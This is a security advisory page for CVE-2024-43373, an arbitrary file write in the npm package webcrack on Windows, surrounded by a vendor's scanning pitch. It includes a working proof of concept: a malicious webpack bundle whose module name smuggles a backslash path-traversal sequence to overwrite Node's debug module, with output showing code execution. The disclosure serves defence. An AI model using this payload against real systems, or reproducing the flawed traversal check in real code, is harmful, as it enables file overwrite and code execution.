Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
📦 npm

GHSA-ccqh-278p-xq6w

HIGH

webcrack has an Arbitrary File Write Vulnerability on Windows when Parsing and Saving a Malicious Bundle

Also known asCVE-2024-43373
Published
Aug 14, 2024
Updated
Nov 18, 2024
Affected
1 pkg
Patched
1 / 1
Exploits
1 known

EPSS Exploitation Probability

via FIRST.org ↗
0.4%probability of exploitation in next 30 days
Lower Risk36th percentile+0.24%
0.00%0.32%0.63%0.95%0.2%0.4%Dec 25Apr 26Jun 26

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.

webcracknpm
9Kdownloads / week

Description

Summary

An arbitrary file write vulnerability exists in the webcrack module when processing specifically crafted malicious code on Windows systems. This vulnerability is triggered when using the unpack bundles feature in conjunction with the saving feature. If a module name includes a path traversal sequence with Windows path separators, an attacker can exploit this to overwrite files on the host system.

Details

Source: packages/webcrack/src/unpack/bundle.ts#L79

import { posix } from 'node:path';
import type { Module } from './module';

// eslint-disable-next-line @typescript-eslint/unbound-method
const { dirname, join, normalize } = posix;

/* ... snip ... */

const modulePath = normalize(join(path, module.path));
if (!modulePath.startsWith(path)) {
    throw new Error(`detected path traversal: ${module.path}`);
}
await mkdir(dirname(modulePath), {
    recursive: true
});
await writeFile(modulePath, module.code, 'utf8');

In this code, the application explicitly relies on the POSIX version of path utilities (dirname, join, normalize) from Node.js. However, the vulnerability arises because the POSIX version of the normalize function does not recognize \ as a path separator. As a result, on Windows systems, the path traversal check fails, allowing an attacker to write files to unintended locations.

PoC

The following proof of concept demonstrates how this vulnerability can be exploited to overwrite and hijack the debug module in Node.js:

Malicious Script (what.js):

(function (e) {
    var n = {};
    function o(r) {
      if (n[r]) {
        return n[r].exports;
      }
      var a = (n[r] = {
        i: r,
        l: false,
        exports: {},
      });
      e[r].call(a.exports, a, a.exports, o);
      a.l = true;
      return a.exports;
    }
    o.p = '';
    o((o.s = 386));
  })({
    './\\..\\node_modules\\debug\\src\\index': function (e, t, n) {
        module.exports = () => console.log("pwned")
    },
  });

Webcrack Script (index.js):

import fs from 'fs';
import { webcrack } from 'webcrack';

const input = fs.readFileSync('what.js', 'utf8');

const result = await webcrack(input);
console.log(result.code);
console.log(result.bundle);
await result.save('output-dir');

Execution: Running the above script with node index.js twice results in the following output being printed to the terminal:

PS C:\Webcrack> node .\index.js
Debugger attached.
(function (e) {
  var n = {};
  function o(r) {
    if (n[r]) {
      return n[r].exports;
    }
    var a = n[r] = {
      i: r,
      l: false,
      exports: {}
    };
    e[r].call(a.exports, a, a.exports, o);
    a.l = true;
    return a.exports;
  }
  o.p = "";
  o(o.s = 386);
})({
  "./\\..\\node_modules\\debug\\src\\index": function (e, t, n) {
    module.exports = () => console.log("pwned");
  }
});
WebpackBundle {
  type: 'webpack',
  entryId: '386',
  modules: Map(1) {
    './\\..\\node_modules\\debug\\src\\index' => WebpackModule {
      id: './\\..\\node_modules\\debug\\src\\index',
      isEntry: false,
      path: '././\\..\\node_modules\\debug\\src\\index.js',
      ast: [Object]
    }
  }
}
Waiting for the debugger to disconnect...
PS C:\Webcrack> node .\index.js
Debugger attached.
pwned
pwned
pwned
pwned
pwned
pwned
pwned
Waiting for the debugger to disconnect...
file:///C:/Webcrack/node_modules/webcrack/dist/index.js:444
  if (options.log) logger(`${name}: started`);
                   ^

TypeError: logger is not a function
    at applyTransforms (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:444:20)
    at Array.<anonymous> (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:4259:7)
    at webcrack (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:4292:20)
    at async file:///C:/Webcrack/index.js:6:16

Node.js v18.16.0

This demonstrates that the debug module was successfully overwritten and hijacked to print pwned to the console, confirming the arbitrary file write vulnerability has lead to code execution.

Impact

This vulnerability allows an attacker to write arbitrary .js files to the host system, which can be leveraged to hijack legitimate Node.js modules to gain arbitrary code execution.

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
📦npmwebcrackall versions2.14.1
Exploits & PoCs
1

Research use only. For defensive security, authorized penetration testing, and academic research only. Never execute exploit code against systems without explicit written authorization.

webcrack is a tool for reverse engineering javascript. An arbitrary file…

github.comNVDAug 2024

Detection & mitigation playbook

Open-source dependency

  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for webcrack. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update webcrack to 2.14.1 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-ccqh-278p-xq6w is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-ccqh-278p-xq6w is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-ccqh-278p-xq6w. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary An arbitrary file write vulnerability exists in the webcrack module when processing specifically crafted malicious code on Windows systems. This vulnerability is triggered when using the unpack bundles feature in conjunction with the saving feature. If a module name includes a path traversal sequence with Windows path separators, an attacker can exploit this to overwrite files on the host system. ### Details Source: [packages/webcrack/src/unpack/bundle.ts#L79](https://github.com/j4k0xb/webcrack/blob/241f9469e6401f3dabc6373233d85a5e76966b54/packages/webcrack/src/unpack/bundle.ts#L
O3 Security · Impact-Aware SCA

Is GHSA-ccqh-278p-xq6w in your dependencies?

O3 detects GHSA-ccqh-278p-xq6w across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works